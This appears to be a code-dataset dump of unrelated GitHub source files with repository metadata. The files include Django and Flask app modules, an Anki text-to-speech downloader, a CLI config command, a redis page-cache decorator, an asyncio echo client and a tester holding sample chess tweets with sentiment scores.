blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2c114217ef73ca6d31f1feed50418ed745207816 | acd41dc7e684eb2e58b6bef2b3e86950b8064945 | /res/packages/scripts/scripts/client/gui/Scaleform/daapi/view/battle/shared/crosshair/settings.py | 657ae2ce4eace767c5376504f12ceb0827b4eee6 | [] | no_license | webiumsk/WoT-0.9.18.0 | e07acd08b33bfe7c73c910f5cb2a054a58a9beea | 89979c1ad547f1a1bbb2189f5ee3b10685e9a216 | refs/heads/master | 2021-01-20T09:37:10.323406 | 2017-05-04T13:51:43 | 2017-05-04T13:51:43 | 90,268,530 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 1,243 | py | # 2017.05.04 15:22:39 Střední Evropa (letní čas)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/battle/shared/crosshair/settings.py
from AvatarInputHandler import aih_constants
CROSSHAIR_CONTAINER_SWF = 'crosshairPanelContainer.swf'
CROSSHAIR_ROOT_PATH = 'root.main'
CROSSHAIR_INIT_CALLBACK = 'registerCrosshairPanel'
CROSSHAIR_ITEM_PATH_FORMAT = '_level0.' + CROSSHAIR_ROOT_PATH + '.{}'
CROSSHAIR_RADIUS_MC_NAME = 'radiusMC'
SPG_GUN_MARKER_ELEMENTS_COUNT = aih_constants.SPG_GUN_MARKER_ELEMENTS_COUNT
SHOT_RESULT_TO_DEFAULT_COLOR = {aih_constants.SHOT_RESULT.UNDEFINED: 'normal',
aih_constants.SHOT_RESULT.NOT_PIERCED: 'red',
aih_constants.SHOT_RESULT.LITTLE_PIERCED: 'orange',
aih_constants.SHOT_RESULT.GREAT_PIERCED: 'green'}
SHOT_RESULT_TO_ALT_COLOR = {aih_constants.SHOT_RESULT.UNDEFINED: 'normal',
aih_constants.SHOT_RESULT.NOT_PIERCED: 'purple',
aih_constants.SHOT_RESULT.LITTLE_PIERCED: 'yellow',
aih_constants.SHOT_RESULT.GREAT_PIERCED: 'green'}
# okay decompyling C:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\client\gui\Scaleform\daapi\view\battle\shared\crosshair\settings.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.05.04 15:22:40 Střední Evropa (letní čas)
| [
"info@webium.sk"
] | info@webium.sk |
db378c92543395fef97a6e3c532b645c55dcff0f | 72b81c092351fa5740f6f156de23e5cc3e6c54e9 | /backEnd/academico/participante/urls.py | 3e749c311221399018f2f82f6dec35fdf301ceaa | [] | no_license | adamtuenti/repositorioDistribuidos | 0c1787726351e87c6272af721f9640f28834ef48 | e49332954437293f87cf62ad645f85208f9ed249 | refs/heads/main | 2023-02-10T03:25:28.748875 | 2021-01-14T04:25:29 | 2021-01-14T04:25:29 | 329,505,161 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,021 | py | from django.urls import path, include
from django.shortcuts import *
from academico.participante.views import *
from django.views.generic import TemplateView
from .views import *
from academico.participante.Api import *
urlpatterns = [
path('asistencia/', asistencia, name="participante_asistencia"),
path('login_participante/',login_participante.as_view(),name='login_participante'),
path('existe_participante/',existe_participante.as_view(),name='existe_participante'),
path('notificaciones_participante/',notificaciones_participante.as_view(),name='notificaciones_participante'),
path('actualizar_notificacion/',actualizar_notificacion.as_view(),name='actualizar_notificacion'),
path('cursos_participante/',cursos_participante.as_view(),name='cursos_participante'),
path('detalles_curso/',detalles_curso.as_view(),name='detalles_curso'),
path('asistencia/by_evento_and_fecha', asistencia_by_evento_and_fecha, name="asistencia_by_evento_and_fecha"),
#---------Reporte----------
path('ParticipantesReprobados/', part_reprobados,name='Part_Reprobados'),
path('historico_participante/', historico_participante, name='historico_participante'),
#--------
path('contacto_participante',contacto_participante,name='contacto_participante'),
path('registro_asistencia_evento/',registro_asistencia_evento,name='registro_asistencia_evento'),
path('reporte_asistencia',reporte_asistencia,name='reporte_asistencia'),
path('perfil_participante',perfil_participante,name='perfil_participante'),
#-----
path('acta_nota_evento',acta_nota_evento,name='acta_nota_evento'),
path('cierre_eventos',cierre_eventos,name='cierre_eventos'),
path('registrar_notas_1raevaluacion',registrar_notas1,name='registrar_notas1'),
path('registrar_notas_mejoramiento',registrar_notas_mejoramiento,name='registrar_notas_mejoramiento'),
path('rectificar_notas',corregir_notas,name='corregir_notas'),
path('aprobar_notas',aprobar_notas,name='aprobar_notas'),
]
| [
"adanavarrete15@gmail.com"
] | adanavarrete15@gmail.com |
c1bceea26ecf4074e830dc137980c465f45a87b6 | 7bebd0ff76a23ee7f334eea4c84ba1759b922992 | /app/main/forms.py | cb753c2aa388ceb469ef1a0283a53ec437f6ba45 | [
"MIT"
] | permissive | MutuaFranklin/PitchCentre | a429ad9414e18b4c54b5ed7405d45586ff0cd391 | da3ccf0b1f5cd165d11f72386aec59a76e79bee2 | refs/heads/main | 2023-07-16T17:34:23.013904 | 2021-08-19T12:30:03 | 2021-08-19T12:30:03 | 395,551,109 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 948 | py | from typing import Text
from flask_wtf import FlaskForm
from wtforms import StringField,TextAreaField, SelectField,SubmitField
from wtforms.validators import Required
from wtforms.ext.sqlalchemy.fields import QuerySelectField
class UpdateProfile(FlaskForm):
bio = TextAreaField('Tell us about you.',validators = [Required()])
submit = SubmitField('Submit')
class PitchForm(FlaskForm):
title = StringField('Enter the title of your pitch',validators=[Required()])
pitch = TextAreaField('Enter your pitch',validators=[Required()])
category =SelectField("Pitch category",choices=[('Product Pitch','Product Pitch'),('Interview Pitch','Interview Pitch'), ('Technology Pitch','Technology Pitch'), ('Fashion Pitch','Fashion Pitch')],validators=[Required()])
submit = SubmitField('Post')
class CommentForm(FlaskForm):
comment = TextAreaField('Add a comment', validators=[Required()])
submit = SubmitField('Post')
| [
"franklin.mutua@student.moringaschool.com"
] | franklin.mutua@student.moringaschool.com |
0efac10fe189e8c081f6014cc173b2a7fa0b30ef | 875fd9c1dec693167919a8049c2a419528eb8913 | /downloadaudio/downloaders/google_tts.py | 31b5d23ed07ead67ab4c3a128df36f863c7d3568 | [] | no_license | ELLIOTTCABLE/anki-download-audio-forvo | c200d3c0ed2d9c193caf59046786389fe66958f0 | f44e287e718f375e38e05968d2e5587b9f002fcf | refs/heads/master | 2021-01-21T12:30:35.677391 | 2017-09-01T04:23:30 | 2017-09-01T04:23:30 | 102,073,183 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,104 | py | # -*- mode: python; coding: utf-8 -*-
#
# Copyright © 2012–15 Roland Sieker <ospalh@gmail.com>
# Copyright © 2015 Paul Hartmann <phaaurlt@gmail.com>
# Inspiration and source of the URL: Tymon Warecki
#
# License: GNU AGPL, version 3 or later; http://www.gnu.org/copyleft/agpl.html
"""
Download pronunciations from GoogleTTS
"""
import urllib
from anki.template import furigana
from ..download_entry import Action, DownloadEntry
from .downloader import AudioDownloader
get_chinese = False
"""
Download for Chinese.
The Chinese support add-on downloads the pronunciation from GoogleTTS.
Using this for Chinese would lead to double downloads for most users,
so skip this by default.
"""
class GooglettsDownloader(AudioDownloader):
u"""Class to get pronunciations from Google’s TTS service."""
def __init__(self):
AudioDownloader.__init__(self)
self.icon_url = 'http://translate.google.com/'
self.url = 'http://translate.google.com/translate_tts?'
def download_files(self, field_data):
"""
Get text from GoogleTTS.
"""
self.downloads_list = []
if field_data.split:
return
if self.language.lower().startswith('zh'):
if not get_chinese:
return
word = furigana.kanji(field_data.word)
else:
word = field_data.word
self.maybe_get_icon()
if not field_data.word:
raise ValueError('Nothing to download')
word_path = self.get_tempfile_from_url(self.build_url(word))
entry = DownloadEntry(
field_data, word_path, dict(Source='GoogleTTS'), self.site_icon)
entry.action = Action.Delete
# Google is a robot voice. The pronunciations are usually
# bad. Default to not keeping them.
self.downloads_list.append(entry)
def build_url(self, source):
u"""Return a string that can be used as the url."""
qdict = dict(
tl=self.language, q=source.encode('utf-8'), ie='utf-8', client='t')
return self.url + urllib.urlencode(qdict)
| [
"ospalh@gmail.com"
] | ospalh@gmail.com |
85f9c234ed1e4cedb44d9c48426cdc833d8ade68 | fcc4df25f539e6057258706b10e1b602d2a3eaf7 | /pyannote/pipeline/__init__.py | b7e880526688d88047ee3c0eda32af18d20bb21e | [
"MIT"
] | permissive | PaulLerner/pyannote-pipeline | 40f08f5f34c1d9e3c8c906396df7322d3627f535 | b6ebc3fcef57c95ad539d79311c64a0b3cf86408 | refs/heads/master | 2020-09-21T18:37:28.447730 | 2019-06-26T20:55:18 | 2019-06-26T20:55:18 | 224,884,842 | 0 | 0 | NOASSERTION | 2019-11-29T16:05:57 | 2019-11-29T16:05:57 | null | UTF-8 | Python | false | false | 1,358 | py | #!/usr/bin/env python
# encoding: utf-8
# The MIT License (MIT)
# Copyright (c) 2018 CNRS
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# AUTHORS
# Hervé BREDIN - http://herve.niderb.fr
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
from .pipeline import Pipeline
from .optimizer import Optimizer
| [
"bredin@limsi.fr"
] | bredin@limsi.fr |
c46871fd6397e3e5b692e19fdb711773176df5ad | 910467bd40fbd6385d22165165b34fbe7940f0e2 | /polyaxon_cli/cli/config.py | b2d52ac4b650732437170f89daf362cc40a8e842 | [
"MIT"
] | permissive | VitaliKaiser/polyaxon-cli | 73bd343ab31c051be490867703566016c41a9fb8 | d70d2af46cc8dceb12b0945c563c625455e66cda | refs/heads/master | 2021-01-25T11:48:52.303584 | 2018-03-01T10:42:38 | 2018-03-01T10:42:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,450 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import click
from polyaxon_cli.managers.config import GlobalConfigManager
from polyaxon_cli.utils.formatting import dict_tabulate, Printer
def validate_options(ctx, param, value):
possible_values = ['verbose', 'host']
if value and value not in possible_values:
raise click.BadParameter(
"Value `{}` is not supported, must one of the value {}".format(value, possible_values))
return value
@click.group(invoke_without_command=True)
@click.option('--list', '-l', is_flag=True, help='List all global config values.')
def config(list):
"""Set and get the global configurations."""
if list:
config = GlobalConfigManager.get_config()
Printer.print_header('Current config:')
dict_tabulate(config.to_dict())
@config.command()
@click.argument('keys', type=str, nargs=-1)
def get(keys):
"""Get the global config values by keys.
Example:
\b
```bash
$ polyaxon config get host http_port
```
"""
config = GlobalConfigManager.get_config_or_default()
if len(keys) == 0:
return
print_values = {}
for key in keys:
if hasattr(config, key):
print_values[key] = getattr(config, key)
else:
click.echo('Key `{}` is not recognised.'.format(key))
dict_tabulate(print_values, )
@config.command()
@click.option('--verbose', type=bool, help='To set the verbosity of the client.')
@click.option('--host', type=str, help='To set the server endpoint.')
@click.option('--http_port', type=int, help='To set the http port.')
@click.option('--ws_port', type=int, help='To set the stream port.')
@click.option('--use_https', type=bool, help='To set the https.')
def set(verbose, host, http_port, ws_port, use_https):
"""Set the global config values.
Example:
\b
```bash
$ polyaxon config set --hots=localhost http_port=80
```
"""
config = GlobalConfigManager.get_config_or_default()
if verbose is not None:
config.verbose = verbose
if host is not None:
config.host = host
if http_port is not None:
config.http_port = http_port
if ws_port is not None:
config.ws_port = ws_port
if use_https is not None:
config.use_https = use_https
GlobalConfigManager.set_config(config)
Printer.print_success('Config was update.')
| [
"mouradmourafiq@gmail.com"
] | mouradmourafiq@gmail.com |
e73fb95f01cb39b90427e85df8567250a84ac39e | 90608029a5e8e0d5392f3373bb50d48771ba2398 | /products/migrations/0001_initial.py | dee6adcdbacf865d6ed1edb73ec0f4bb375167d3 | [] | no_license | wahid999/PyShop | 986e78fbc7c000c082fdf860a182e985cd41c45c | 1bb639125a0292010153f67912b9dc54f3318b5a | refs/heads/master | 2023-07-12T10:52:21.113216 | 2021-08-24T01:21:26 | 2021-08-24T01:21:26 | 399,295,648 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 651 | py | # Generated by Django 3.1.3 on 2021-08-23 05:19
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('price', models.FloatField()),
('stock', models.IntegerField()),
('image_url', models.CharField(max_length=2083)),
],
),
]
| [
"wahidhussainturi@gmail.com"
] | wahidhussainturi@gmail.com |
220e633d0a3fd6cc2ab8040031f3ad949c5aeafd | ed823aaa73e9482576a7207c9c61953440540ee7 | /PycharmProjects/Selenium-python/multiplelist.py | bba790522c83ade5102176f599db41e84a46b213 | [] | no_license | KavithaBitra1980/pycharm-selenuim | 64b35ae4797e7ecb4644c06b0b12cdf629fcdf4d | 132b90d94461eccad30d7181651ba532674f3da9 | refs/heads/master | 2020-04-02T14:09:50.261066 | 2018-12-01T21:29:02 | 2018-12-01T21:29:02 | 154,513,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | #demo for multiplelists using ZIP
l1 = [1,2,3]
l2 = [3,4,5,10,20,30]
l3 = [5,10,15,20,25]
for a,b in zip(l1,l2):
print('the multiplication of both matrixes is',2*(a*b))
for a,b,c in zip(l1,l2,l3):
print(a,b,c)
if a < b and a <c and b < c:
print(a ,'is the smallest')
print(c, 'is the largest')
print(b, 'is larger than ', a)
"""
RESULTS
the multiplication of both matrixes is 6
the multiplication of both matrixes is 16
the multiplication of both matrixes is 30
1 3 5
1 is the smallest
5 is the largest
3 is larger than 1
2 4 10
2 is the smallest
10 is the largest
4 is larger than 2
3 5 15
3 is the smallest
15 is the largest
5 is larger than 3
""" | [
"kavithabitra1980@gmail.com"
] | kavithabitra1980@gmail.com |
6b7f58b30f675887a80ab342faf04989a04ff4ef | a5d21c7b508d86229faef0b5781b91631def00c0 | /0x0B_redis_basic/web.py | 68db1bf67401a0728e47b3de243d6b07d979e22b | [] | no_license | SeifJelidi/holbertonschool-web_back_end | 0361d43c9540c0d0312790e81b46d08cff689025 | a83f490066193fe2b03f60ee3b18a968b46d8fc0 | refs/heads/master | 2023-08-13T15:19:43.460754 | 2021-10-18T08:56:24 | 2021-10-18T08:56:24 | 388,186,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | #!/usr/bin/env python3
"""web module"""
from typing import Callable
import requests
import redis
from functools import wraps
redis_object = redis.Redis()
def count_req(method: Callable) -> Callable:
"""Count Request"""
@wraps(method)
def wrapper(link):
"""Wrapper method"""
redis_object.incr("count:{}".format(link))
c = redis_object.get("cached:{}".format(link))
if c:
return c.decode('utf-8')
r = method(link)
redis_object.setex("cached:{}".format(link), 10, r)
return r
return wrapper
@count_req
def get_page(url: str) -> str:
"""get_page"""
request = requests.get(url)
return request.text
| [
"you@example.com"
] | you@example.com |
9c91809b744ff16932feb411b09b7423b511a93b | d83118503614bb83ad8edb72dda7f449a1226f8b | /src/dprj/platinumegg/app/cabaret/models/AppConfig.py | b3e39931ac2f8eb97496fa5f9e2cc1cdee59154c | [] | no_license | hitandaway100/caba | 686fe4390e182e158cd9714c90024a082deb8c69 | 492bf477ac00c380f2b2758c86b46aa7e58bbad9 | refs/heads/master | 2021-08-23T05:59:28.910129 | 2017-12-03T19:03:15 | 2017-12-03T19:03:15 | 112,512,044 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,988 | py | # -*- coding: utf-8 -*-
import settings_sub
from django.db import models
from platinumegg.app.cabaret.models.base.models import Singleton, BaseModel
from platinumegg.lib.opensocial.util import OSAUtil
from platinumegg.app.cabaret.models.base.fields import TinyIntField,\
AppDateTimeField, JsonCharField, PositiveAutoField, ObjectField
from defines import Defines
from platinumegg.app.cabaret.models.base.util import dict_to_choices
class AppConfig(Singleton):
"""メンテナンス設定.
"""
class Meta:
app_label = settings_sub.APP_NAME
abstract = False
maintenancetype = TinyIntField(verbose_name=u'メンテフラグ', choices=dict_to_choices(Defines.MaintenanceType.NAMES), default=Defines.MaintenanceType.EMERGENCY)
stime = AppDateTimeField(default=OSAUtil.get_now, verbose_name=u'メンテ開始時間')
etime = AppDateTimeField(default=OSAUtil.get_now, verbose_name=u'メンテ終了時間')
master = models.PositiveIntegerField(default=0, verbose_name=u'マスターデータ番号')
def is_maintenance(self):
if self.is_emergency():
return True
elif self.stime <= OSAUtil.get_now() < self.etime:
return True
return False
def is_platform_maintenance(self):
"""プラットフォームのメンテか.
"""
return self.maintenancetype in (Defines.MaintenanceType.REGULAR_PLATFORM, Defines.MaintenanceType.EMERGENCY_PLATFORM)
def is_emergency(self):
"""緊急メンテか.
"""
return self.maintenancetype in (Defines.MaintenanceType.EMERGENCY, Defines.MaintenanceType.EMERGENCY_PLATFORM)
@classmethod
def getModel(cls):
model = cls.getSingletonModel()
if model is None:
model = cls()
model.save()
return model
class PreRegistConfig(Singleton):
"""事前登録設定.
"""
class Meta:
app_label = settings_sub.APP_NAME
abstract = False
etime = AppDateTimeField(default=OSAUtil.get_now, verbose_name=u'事前登録終了時間')
prizes = JsonCharField(default=list, verbose_name=u'事前登録報酬')
def is_before_publication(self):
now = OSAUtil.get_now()
if now < self.etime:
return True
return False
class MessageQueue(BaseModel):
"""メッセージAPIのキュー.
"""
class Meta:
app_label = settings_sub.APP_NAME
abstract = False
id = PositiveAutoField(primary_key=True, verbose_name=u'ID')
stime = AppDateTimeField(default=OSAUtil.get_now, verbose_name=u'送信開始時間', db_index=True)
title = models.CharField(max_length=26, verbose_name=u'タイトル')
body = models.CharField(max_length=100, verbose_name=u'本文')
recipients = ObjectField(default=list, verbose_name=u'送信先(未指定の場合は全員)')
jumpto = models.CharField(max_length=100, verbose_name=u'飛び先', blank=True)
| [
"shangye@mail.com"
] | shangye@mail.com |
c9fe70da36618c2cb74ba704579300f060bdfe9c | dcce56815dca2b18039e392053376636505ce672 | /dumpscripts/asyncio_echo_client_coroutine.py | 05309a636fa1c68dedb183a41da0a63c3998acb5 | [] | no_license | robertopauletto/PyMOTW-it_3.0 | 28ff05d8aeccd61ade7d4107a971d9d2576fb579 | c725df4a2aa2e799a969e90c64898f08b7eaad7d | refs/heads/master | 2021-01-20T18:51:30.512327 | 2020-01-09T19:30:14 | 2020-01-09T19:30:14 | 63,536,756 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,366 | py | # asyncio_echo_client_coroutine.py
import asyncio
import logging
import sys
MESSAGES = [
b"Questo e' il messaggio. ",
b"Sara' inviato ",
b'in parti.',
]
SERVER_ADDRESS = ('localhost', 10000)
logging.basicConfig(
level=logging.DEBUG,
format='%(name)s: %(message)s',
stream=sys.stderr,
)
log = logging.getLogger('main')
event_loop = asyncio.get_event_loop()
async def echo_client(address, messages):
log = logging.getLogger('echo_client')
log.debug('connessione a {} porta {}'.format(*address))
reader, writer = await asyncio.open_connection(*address)
# Potrebbe essere writer.writelines() eccetto che
# avrebbe reso più difficile mestrare ciascuna parte del messaggio
# che sta per essere spedito..
for msg in messages:
writer.write(msg)
log.debug('in invio {!r}'.format(msg))
if writer.can_write_eof():
writer.write_eof()
await writer.drain()
log.debug('in attesa di risposta')
while True:
data = await reader.read(128)
if data:
log.debug('ricevuto {!r}'.format(data))
else:
log.debug('in chiusura')
writer.close()
return
try:
event_loop.run_until_complete(
echo_client(SERVER_ADDRESS, MESSAGES)
)
finally:
log.debug('chiusura del ciclo di eventi')
event_loop.close()
| [
"roberto.pauletto@gmail.com"
] | roberto.pauletto@gmail.com |
1de640a90b5b770e3e3e3bebdc71b760e13989bb | fa89010f366aa33967c12636bf6cfae6105a9ee5 | /ex7/testers/tset.py | 7832f614cb95b54fe1374b5f8f612ee3b6833a5c | [] | no_license | borgr/intro2cs | 4db1985b789d0938d7c9cecddbe5a302f284bd95 | 9030d9831a168d9636093bd5211926666298d80f | refs/heads/master | 2020-05-29T19:35:20.829664 | 2016-10-22T06:07:22 | 2016-10-22T06:07:22 | 15,959,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,198 | py | import datetime
from geo import Position
from string import ascii_letters
from data import load_sentiments
import itertools as it
tweetlist = [["Can't wait to get the ballers going. If I can do half of what Gary Rankin has done I will be happy. The time is now. Chess not checkers.", datetime.datetime(2011, 8, 28, 21, 53, 4), 35.88101863, -84.12181997, ['can', 't', 'wait', 'to', 'get', 'the', 'ballers', 'going', 'if', 'i', 'can', 'do', 'half', 'of', 'what', 'gary', 'rankin', 'has', 'done', 'i', 'will', 'be', 'happy', 'the', 'time', 'is', 'now', 'chess', 'not', 'checkers'], -0.25],
['I love playing chess secret society get it...', datetime.datetime(2011, 8, 28, 21, 59, 6), 40.73608366, -73.88225612, ['i', 'love', 'playing', 'chess', 'secret', 'society', 'get', 'it'], 0.041666666666666664],
['Arena sized chess in Westlake Park. http://t.co/fChffds', datetime.datetime(2011, 8, 28, 22, 13, 56), 47.61048985, -122.33720303, ['arena', 'sized', 'chess', 'in', 'westlake', 'park', 'http', 't', 'co', 'fchffds'], None],
['A Correspondence Chess Win By Resignation http://t.co/kN0SEDw', datetime.datetime(2011, 8, 29, 14, 58, 32), 29.424222, -98.493196, ['a', 'correspondence', 'chess', 'win', 'by', 'resignation', 'http', 't', 'co', 'kn', 'sedw'], None],
['Life is a game of chess with no cleavage', datetime.datetime(2011, 8, 29, 15, 26, 2), 30.40810281, -84.28319438, ['life', 'is', 'a', 'game', 'of', 'chess', 'with', 'no', 'cleavage'], -0.375],
['Chess and heuristics. The deeper the search, the better the computer plays', datetime.datetime(2011, 8, 29, 17, 46, 22), 40.73021739, -73.98686309, ['chess', 'and', 'heuristics', 'the', 'deeper', 'the', 'search', 'the', 'better', 'the', 'computer', 'plays'], 0.875],
['We all agree -- @Martindillon would love this. @ Chess and Checkers House http://t.co/p1vPsQU', datetime.datetime(2011, 8, 29, 21, 11, 10), 40.76900427, -73.97480965, ['we', 'all', 'agree', 'martindillon', 'would', 'love', 'this', 'chess', 'and', 'checkers', 'house', 'http', 't', 'co', 'p', 'vpsqu'], 0.5625],
["Chess with friends is where it's at.", datetime.datetime(2011, 8, 30, 1, 31, 2), 37.16132952, -76.51713034, ['chess', 'with', 'friends', 'is', 'where', 'it', 's', 'at'], None],
['If I get more bored, I might decide to take up chess.', datetime.datetime(2011, 8, 30, 3, 4, 40), 44.18803828, -79.93544197, ['if', 'i', 'get', 'more', 'bored', 'i', 'might', 'decide', 'to', 'take', 'up', 'chess'], -0.25],
['I hate chess I never win', datetime.datetime(2011, 8, 30, 3, 43, 13), 43.1896701, -77.5615805, ['i', 'hate', 'chess', 'i', 'never', 'win'], -0.34375],
['Sinclair loses at chess every 20sec and it makes a BEWWW sound every time. I love fake tv video games.', datetime.datetime(2011, 8, 30, 4, 3, 55), 47.6675083, -122.3767418, ['sinclair', 'loses', 'at', 'chess', 'every', 'sec', 'and', 'it', 'makes', 'a', 'bewww', 'sound', 'every', 'time', 'i', 'love', 'fake', 'tv', 'video', 'games'], 0.0],
['its like a game of chess... check and mate.', datetime.datetime(2011, 8, 30, 4, 19, 49), 33.87020417, -118.15500751, ['its', 'like', 'a', 'game', 'of', 'chess', 'check', 'and', 'mate'], -0.08333333333333333],
['Lifes like a chess move, make your next move', datetime.datetime(2011, 8, 30, 5, 27, 21), 41.72347118, -71.46565332, ['lifes', 'like', 'a', 'chess', 'move', 'make', 'your', 'next', 'move'], 0.125],
['@MarquesaCaro web us no chess misis marquesa', datetime.datetime(2011, 8, 30, 7, 13, 52), 20.71473678, -100.45354163, ['marquesacaro', 'web', 'us', 'no', 'chess', 'misis', 'marquesa'], 0.0],
['Every man needs a women when his life is a mess because the QUEEN protects the king , like a game of chess. #MrJuug #KingShit', datetime.datetime(2011, 8, 28, 23, 11, 8), 35.8481425, -78.6065005, ['every', 'man', 'needs', 'a', 'women', 'when', 'his', 'life', 'is', 'a', 'mess', 'because', 'the', 'queen', 'protects', 'the', 'king', 'like', 'a', 'game', 'of', 'chess', 'mrjuug', 'kingshit'], -0.16666666666666666],
['@DaZackTesolin CHESS !', datetime.datetime(2011, 8, 30, 14, 20, 26), 42.25032829, -83.01735778, ['dazacktesolin', 'chess'], None],
['Contact Chess - Martial Art of Mind. Anatomy of a Fight http://t.co/4neasaN', datetime.datetime(2011, 8, 30, 16, 42, 12), 33.952602, -84.549933, ['contact', 'chess', 'martial', 'art', 'of', 'mind', 'anatomy', 'of', 'a', 'fight', 'http', 't', 'co', 'neasan'], -0.0625],
['I wish I can win in chess.', datetime.datetime(2011, 8, 31, 3, 10, 56), 40.9275493, -74.0041221, ['i', 'wish', 'i', 'can', 'win', 'in', 'chess'], 0.0],
['This is a game of chess', datetime.datetime(2011, 8, 31, 7, 7, 19), 32.79806793, -96.69127464, ['this', 'is', 'a', 'game', 'of', 'chess'], -0.5],
['Life is really a game of chess', datetime.datetime(2011, 8, 31, 9, 57, 12), 39.9719747, -75.2022334, ['life', 'is', 'really', 'a', 'game', 'of', 'chess'], 0.0625],
['Organized all my apps into folders in Launchpad. Realized I have all of two games on my Mac: Chess and Hordes of Orcs.', datetime.datetime(2011, 8, 31, 13, 30, 23), 33.98603179, -81.02913662, ['organized', 'all', 'my', 'apps', 'into', 'folders', 'in', 'launchpad', 'realized', 'i', 'have', 'all', 'of', 'two', 'games', 'on', 'my', 'mac', 'chess', 'and', 'hordes', 'of', 'orcs'], 0.25],
['make your next move your best move chess not checkers', datetime.datetime(2011, 8, 31, 18, 29, 40), 29.84602948, -95.42305242, ['make', 'your', 'next', 'move', 'your', 'best', 'move', 'chess', 'not', 'checkers'], 0.20833333333333334],
['@CW_baybee nah Im in, I gotta get up early 2moro and no I was playin chess', datetime.datetime(2011, 9, 1, 3, 25, 21), 32.2988318, -90.2035996, ['cw', 'baybee', 'nah', 'im', 'in', 'i', 'gotta', 'get', 'up', 'early', 'moro', 'and', 'no', 'i', 'was', 'playin', 'chess'], -0.25],
['I NEED TO PLAY #chess WITH SOMEONE !', datetime.datetime(2011, 9, 1, 4, 26, 27), 40.748197, -74.239215, ['i', 'need', 'to', 'play', 'chess', 'with', 'someone'], -0.25],
["I'm at Willie Dixon's Blues Heaven Foundation (Historic Site of Chess Records) (2120 S. Michigan Ave., Chicago) http://t.co/y9PA5Yi", datetime.datetime(2011, 9, 1, 4, 42, 35), 41.853589, -87.624231, ['i', 'm', 'at', 'willie', 'dixon', 's', 'blues', 'heaven', 'foundation', 'historic', 'site', 'of', 'chess', 'records', 's', 'michigan', 'ave', 'chicago', 'http', 't', 'co', 'y', 'pa', 'yi'], -0.25],
['Missing alll da bet chess @izbrittanybetch @blbolton11 @Caweeener @kriztoefor @BHOLTZ8 @roma_desai @gsemz', datetime.datetime(2011, 9, 1, 5, 13, 52), 40.95712697, -76.8840182, ['missing', 'alll', 'da', 'bet', 'chess', 'izbrittanybetch', 'blbolton', 'caweeener', 'kriztoefor', 'bholtz', 'roma', 'desai', 'gsemz'], -0.5],
['Trying to bang this dude is like playing a chess game. I just want Belgium waffles.', datetime.datetime(2011, 9, 1, 5, 23, 59), 30.26968628, -97.74949126, ['trying', 'to', 'bang', 'this', 'dude', 'is', 'like', 'playing', 'a', 'chess', 'game', 'i', 'just', 'want', 'belgium', 'waffles'], -0.08928571428571429],
['Up playing chess #IAmTheBest', datetime.datetime(2011, 9, 1, 6, 42, 56), 33.72647953, -116.96683979, ['up', 'playing', 'chess', 'iamthebest'], None],
